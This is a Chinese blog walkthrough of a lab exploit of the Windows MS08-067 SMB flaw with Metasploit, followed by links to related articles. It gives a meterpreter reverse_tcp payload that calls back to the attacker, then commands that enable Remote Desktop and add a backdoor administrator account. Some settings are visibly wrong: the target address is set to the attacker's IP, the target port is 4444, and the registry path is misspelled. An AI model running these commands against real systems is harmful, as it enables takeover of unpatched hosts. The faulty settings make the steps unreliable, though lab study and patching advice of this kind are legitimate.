ms08-067 漏洞攻击(远程命令执行)

已于 2024-07-11 22:58:50 修改
阅读量581 收藏 13
点赞数 8
分类专栏: 网络安全 文章标签: 网络
于 2024-07-11 22:58:31 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_74062309/article/details/140336484
版权

渗透测试实战:

准备两台虚拟机

攻击机:kali IP:192.168.10.129 

靶机:WinXPenSP3 IP:192.168.10.128

漏洞描述:

Microsoft  Windows Server 服务 RPC 请求缓冲区溢出漏洞
Windows的 Server 服务在处理特质 RPC 请求时存在缓冲区溢出漏洞,远程攻击者可以通过发送恶意的 RPC 请求触发这个溢出,导致完全入侵用户系统, SYSTEM 权限执行任意指令。
对于Windows 2000 、 XP 和 Server 2003 ,无需认证便可以利用该漏洞;
对于Windows Vista 和 Server 2008 ,可能需要认证。

当用户在受影响的系统上收到RPC请求时,该漏洞会允许远程执行代码,攻击者可以在未经身份验证情况下利用此漏洞运行任意代码。同时,该漏洞可以用于蠕虫攻击。它影响了某些旧版本的Windows系统,包括:

  • Windows 2000
  • Windows XP
  • Windows Server 2003

实战步骤: 

  • 查询靶机是否存活(ping)192.168.10.128

  • 利用nmap查询扫描

  • 进入Msfconsole  使用search 

  • 进入漏洞模块使用 exploit/windonws/smb/ms08_067_netapi

use exploit/Windows/smb/ms08_067_netapi
或者 
use 0

  • 设置攻击信息

# 目标机ip
set RHOST 192.168.10.129
# 端口号
set RPORT 4444
# 设置payload
set payload windows/meterpreter/reverse_tcp
# 攻击机ip
set LHOST 192.168.10.129
# 显示配置信息
show options

  • show options 查看信息无误后执行

  • 进入shell界面 创建账号建立管理员

  • 命令设置注册表

REG ADD HKLM\SYSTEM\CurrentControSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f 
# 增加普通用户
net user yjs 123456 /add 
# 提升管理员权限
net localgroup administrators yjs /add

  • 然后重开一个终端使用远程桌面输入新创建的管理员

  • 登录成功

总结

老系统漏洞修复更新系统升级到最新的Windows系统,安装KB958644补丁。

修改远程桌面默认端口,或关闭该服务

学习如同播种,只要你辛勤耕耘,必将收获丰硕的果实,相信你的努力不会白费。

尤尔哈丶
关注
专栏目录
MS08-067 (CVE-2008-4250) 远程命令执行漏洞
做自己喜欢的事,并将其发挥到极致!
03-18 1万+
文章目录前言一、漏洞简介二、影响范围三、漏洞危害四、本地复现五、补丁编号六、 Windows Server 2003 SP2 中文版利用方法七、漏洞原理深度剖析 前言 本文为08年出现的漏洞进行复现,仅作为学习参考,切勿非法利用! 一、漏洞简介 MS08-067漏洞是通过MSRPC over SMB通道调用Server服务程序中的NetPathCanonicalize 函数时触发的,而NetPathCanonicalize 函数在远程访问其他主机时,会调用NetpwPathCanonicalize函数,
[漏洞挖掘与防护] 02.漏洞利用MS08-067远程代码执行漏洞复现及深度防御
杨秀璋的专栏
07-14 599
上一篇文章将详细介绍Windows远程桌面服务漏洞(CVE-2019-0708),该高危漏洞利用方式是通过远程桌面端口3389,RDP协议进行攻击。这篇文章将详细讲解MS08-067远程代码执行漏洞(CVE-2008-4250)及防御过程,它是Windows Server服务RPC请求缓冲区溢出漏洞利用445端口,并通过Metasploit工具获取shell及进行深入的操作。希望对入门的同学有帮助。
ms08-067溢出工具
05-20
ms08-067远程命令执行
[CVE-2017-8464]Microsoft Windows远程命令执行漏洞复现
weixin_30237719的博客
06-16 293
版权声明:本文为博主的原创文章,未经博主同意不得转载 前言 记录下自己的复现,保留意见 2017年6月13日,微软官方发布编号为CVE-2017-8464的漏洞公告,官方介绍Windows系统在解析快捷方式时存在远程执行任意代码的高危漏洞,分别存在于LNK文件和Windows Search功能中。黑客可以通过U盘、网络共享等途径触发漏洞,完全控制用户系统,安全风险高危 概述 微软的...
网络安全】全网最全的渗透测试介绍(超详细)
最新发布
Cairo_A的博客
08-22 630
渗透测试的前提一定是得经过系统所有者的授权! 未经过授权的渗透测试,就是违法行为!
(菜鸟自学)Metasploit漏洞利用——ms08-067
nbdlsplyb的博客
01-20 1728
MS08-067 是指微软于2008年发布的一个安全漏洞(CVE-2008-4250)。该漏洞影响了 Windows 操作系统中的 Server Service,可被远程攻击利用执行任意代码,从而完全控制受影响的系统。这个漏洞主要影响 Windows 2000、Windows XP 和 Windows Server 2003 等早期版本的操作系统。攻击者可以通过发送特制的网络请求,利用漏洞执行恶意代码,从而取得对受感染计算机的完全控制权。
MS08-067 漏洞利用与安全加固
theRavensea
03-15 2249
攻击利用受害者主机默认开发的SMB服务的端口445 发送特殊RPC(Remote Procedure Call,远程过程调用)请求,造成可被利用并可远程执行代码。MS08_067 漏洞的全程为 “WIndows Server 服务RPC请求缓冲区溢出漏洞”,如果用户在受影响的系统上收到特制的RPC请求。则该漏洞可能允许远程执行代码。 Ms08_067_netapi 是Metasploit 中的一款溢出攻击载荷。NetPathCanonicalize 函数在远程访问其他主机时会调用 NetpwCanoni
ms08_067复现(windows sever 2003 英文/中文版系统)
weixin_43610673的博客
07-19 1539
试了一下英文版系统和中文版系统,英文版的没问题。中文版的尝试很多次都不行。 文章目录英文版系统:中文版系统: 英文版系统: Windows server 2003 :10.0.2.15 Kali:10.0.2.4 Nmap扫描一下 nmap -O -sV --script=vuln 10.0.2.15 445端口开启且存在ms08_067漏洞 Msf 搜索对应的模块 选一个payload 设置参数就可以用了,targets默认是0(自动选择) 可以自己选择 Show targets 直接得到了一
Kali之MSF的MS08-067漏洞复现详解
weixin_47899104的博客
12-05 7452
MSF即Metasploit Framework,是一个综合性的渗透测试工具,集成信息收集、漏洞扫描、漏洞利用以及提权等功能的工具。 目前安装的kali都自带MSF,可以直接在图形界面打开 也可以在kali的终端通过使用命令msfconsole来打开。 ┌──(kali㉿kali)-[~] └─$ ls /usr/share/metasploit-framework/ 或者2022版kali以后(在这之前的版本不知道可不可行)的直接桌面按如下步骤找到msf安装目录。 ①auxiliary模块:主要包含渗透测
利用win系统ms08-067漏洞.docx
10-26
MS08-067漏洞Windows操作系统中一个严重的漏洞,它允许攻击者在无需身份验证的情况下远程执行代码。该漏洞于2008年10月โดยMicrosoft发布了补丁,但直到现在仍然有很多系统没有打补丁,导致攻击者可以轻易地利用...
使用Nmap漏扫+Metasploit渗透测试框架,利用MS08-067漏洞渗透
george1898的博客
12-25 1192
本期框架介绍:Metasploit是一一款开源的安全漏洞检测工具。它可以帮助用户识别安全问题,验证漏洞的缓解措施,并对某些软件进行安全评估,提供真正的安全风险情报。当用户第一次接触Metasploit渗透测试框架软件(MSF)时,可能会被它提供如此多的接口中、选项、变量和模块所震撼,而感觉无所适从。下面我们将应用一个安全来熟透认知、一起来探讨它的微妙吧!
Windows XP SP2(MS08-067漏洞复现及利用)
sGanYu
09-03 5424
打开kali,开启msf所依赖的数据库 启动msfconsole 搜寻关于ms08-067有关的漏洞 使用 输入show options显示ms08-067模块所需的参数 配置参数,设置目标操作系统类型为4
Windows漏洞MS08-067远程代码执行漏洞复现及深度防御
华为云官方博客
11-16 9075
摘要:详细讲解MS08-067远程代码执行漏洞(CVE-2008-4250)及防御过程
metasploit MS08-067漏洞利用
gclome的博客
11-14 1239
环境(两台虚拟机): 攻击机(kali):192.168.31.231 目标机(win xp):192.168.31.94 1.使用msfconsole 进入 metasploit 控制台 2.使用search ms08-067 搜索ms08-067利用的exploit 3.使用use exploit/windows/smb/ms08_067_netapi选择exploit 4.使用show o...
MS08-067 漏洞利用与安全加固,高级网络安全程序员必会
2301_76190858的博客
04-03 1661
攻击利用受害者主机默认开发的SMB服务的端口445 发送特殊RPC(Remote Procedure Call,远程过程调用)请求,造成可被利用并可远程执行代码。MS08_067 漏洞的全程为 “WIndows Server 服务RPC请求缓冲区溢出漏洞”,如果用户在受影响的系统上收到特制的RPC请求。则该漏洞可能允许远程执行代码。Ms08_067_netapi 是Metasploit 中的一款溢出攻击载荷。
Metasploit MS08-067 漏洞利用演示
qq_36991248的博客
12-31 2762
Metasploit MS08-067 漏洞利用演示 MS08-067漏洞的全称为“Windows Server服务RPC请求缓冲区溢出漏洞”,如果用户在受影响的系统上收到特制的 RPC 请求,则该漏洞可能允许远程执行代码。此漏洞可用于进行蠕虫攻击,目前已经有利用漏洞的蠕虫病毒。 原理解析: 攻击利用windows操作系统默认开放的SMB服务445端口发送恶意代码到目标主机,通过MSRPC接口调用Server服务的一个函数,溢出栈缓冲区,获得远程代码执行权限,从而完全控制主机Win..
微软MS08-067漏洞,小白必看,超详细!!!
weixin_62490257的博客
06-30 2193
微软MS08-067漏洞内渗透,小白必看,超详细!!!
经典漏洞MS08_067如何利用
乌云__SS的博客
05-20 5242
1.首先需要下载kali安装到VMware中,如何安装参考我之前的文本,要想复现该漏洞需要一个xp系统,防火墙关闭。这里xp系统的安装就不多做介绍了。 2.下载好kali后需要验证网络是否通畅,出现以下界面则网络通畅 ping www.baidu.com 若网络不通畅则检查自己的虚拟机设置 3.打开msfconsole工具 msfconsole 4.查找ms08_067...
远程命令执行——MS08-067漏洞利用
wwwwyyyrre的博客
04-24 1238
漏洞是通过 MSRPC over SMB 通道调用 Server 服务程序中的 NetPathCanonicalize 函数时触发的,而 NetPathCanonicalize 函数在远程访问其他主机时,会调用 NetpwPathCanonicalize 函数,对远程访问的路径进行规范化,而在 NetpwPathCanonicalize 函数中存在的逻辑错误,造成栈缓冲区可被溢出,而获得远程代码执行(Remote Code Execution)。因为在配置里,攻击机以及攻击端口都有所以不需要重新配置。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

尤尔哈丶

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值